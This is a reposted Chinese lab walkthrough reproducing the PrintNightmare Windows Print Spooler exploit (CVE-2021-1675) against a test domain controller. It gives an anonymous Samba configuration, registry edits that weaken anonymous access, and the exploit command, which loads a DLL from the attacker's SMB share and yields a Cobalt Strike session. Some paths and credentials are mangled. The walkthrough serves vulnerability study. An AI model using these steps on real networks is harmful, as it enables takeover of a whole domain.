漏洞复现|PrintNightmare(CVE-2021-1675)复现

admin 2022年1月5日03:00:50安全文章评论23 views1764字阅读5分52秒阅读模式


漏洞复现|PrintNightmare(CVE-2021-1675)复现

点击上方蓝字关注我们


0x01 简介

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

环境准备

  • 一个普通权限的域账户

  • 目标开启Spooler服务

  • 创建的smb服务允许匿名访问,即目标可以直接获取到文件

  DC WindowsServer 2016 Standard

windows smba服务器:win10

linux smba服务器:kali

0x02 linux下攻击手法

在linux环境下,使用smbd服务可以很方便的开启匿名的samba服务器。

首先使用yum或者apt安装samba,安装完成之后修改/etc/samba/smb.conf文件为以下配置。

[global] workgroup = WORKGROUP server string = Samba Server netbios name = MYSERVER log file = /var/log/samba/log.%m max log size = 50 security = user map to guest = Bad User [smb] comment = Template Directories browseable = yes writeable = yes path = /tmp/ guest ok = yes

其中[smb]为访问该服务器共享文件夹的名称,path为samba服务器共享的目录。

修改完成之后使用命令service smbd start开启smba服务器。

漏洞复现|PrintNightmare(CVE-2021-1675)复现

使用脚本CVE-2021-1675.py执行以下命令

python3 CVE-2021-1675.py hack.com/user1:[email protected]@192.168.28.191 '\192.168.28.190smbartifact.dll'

漏洞复现|PrintNightmare(CVE-2021-1675)复现

当出现Exploit Completed关键字的时候即为攻击成功。

漏洞复现|PrintNightmare(CVE-2021-1675)复现

可以看到已经成功上线cs

0x03 windows下攻击手法

这里使用的是三好学生的脚本

https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer

还有cube0x0放出的脚本

mkdir C:share icacls C:share /T /grant Anonymous` logon:r icacls C:share /T /grant Everyone:r New-SmbShare -Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f REG ADD "HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f REG ADD "HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

入口机器执行该脚本

漏洞复现|PrintNightmare(CVE-2021-1675)复现

使用脚本CVE-2021-1675.py执行以下命令

python3 CVE-2021-1675.py hack.com/user1:User@hack[email protected]192.168.28.197 '\192.168.28.187smbartifact.dll'

漏洞复现|PrintNightmare(CVE-2021-1675)复现

漏洞复现|PrintNightmare(CVE-2021-1675)复现

可以看到已经上线成功了


漏洞复现|PrintNightmare(CVE-2021-1675)复现

原文始发于微信公众号(灼剑安全团队):漏洞复现|PrintNightmare(CVE-2021-1675)复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日03:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  漏洞复现|PrintNightmare(CVE-2021-1675)复现 http://cn-sec.com/archives/718582.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: